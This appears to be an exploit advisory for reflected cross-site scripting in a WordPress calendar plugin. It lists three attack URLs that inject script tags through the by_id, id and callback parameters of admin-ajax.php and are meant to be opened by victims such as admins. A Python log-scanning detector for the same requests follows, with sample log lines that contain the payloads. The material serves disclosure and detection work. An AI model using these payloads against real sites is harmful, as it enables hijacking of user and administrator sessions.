## https://sploitus.com/exploit?id=WPEX-ID:F1244C57-D886-4A6E-8CDB-18404E8C153C
1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist)

Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:

1. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script>

2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script>

3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>
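
A detection sketch for the three request shapes listed above, added here as an example and not part of the original advisory or the plugin's code. It flags `admin-ajax.php` requests with `action=cdaily` whose `by_id`, `id` or `callback` value contains HTML metacharacters or path traversal after decoding. It assumes legitimate values for these parameters are plain identifiers; the log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory shows being reflected, keyed by subaction.
WATCHED = {
    "cd_displayday": ("by_id",),
    "cd_calendar": ("id",),
    "cd_dismisshint": ("callback",),
}
# Assumption: an id or callback name never needs markup characters or "../".
SUSPICIOUS = re.compile(r"[<>\"'`]|\.\./")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not real traffic.
LOG_PREFIX = '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction='
SAMPLE_LOG = [LOG_PREFIX + tail + ' HTTP/1.1" 200 512' for tail in (
    "cd_calendar&id=3",
    "cd_calendar&id=XX%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "cd_dismisshint&callback=jQuery111_1700000000",
    "cd_dismisshint&callback=%253Cscript%253Ealert(1)%253C/script%253E",
    "cd_displayday&callback=1&bymethod=&by_id=/../../r%26_=--%3E%3Cscript%3Ealert(1)%3C/script%3E",
)]

def flag_request(log_line):
    """Return (subaction, param, decoded_value) for a suspicious request, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    if qs.get("action", [""])[0] != "cdaily":
        return None
    sub = qs.get("subaction", [""])[0]
    for param in WATCHED.get(sub, ()):
        for value in qs.get(param, []):
            decoded = unquote(value)  # second decode pass catches double-encoding
            if SUSPICIOUS.search(decoded):
                return (sub, param, decoded)
    return None

def scan(lines):
    """Return [(line_index, hit), ...] for every flagged line."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := flag_request(line))]

if __name__ == "__main__":
    for index, hit in scan(SAMPLE_LOG):
        print(index, hit)
```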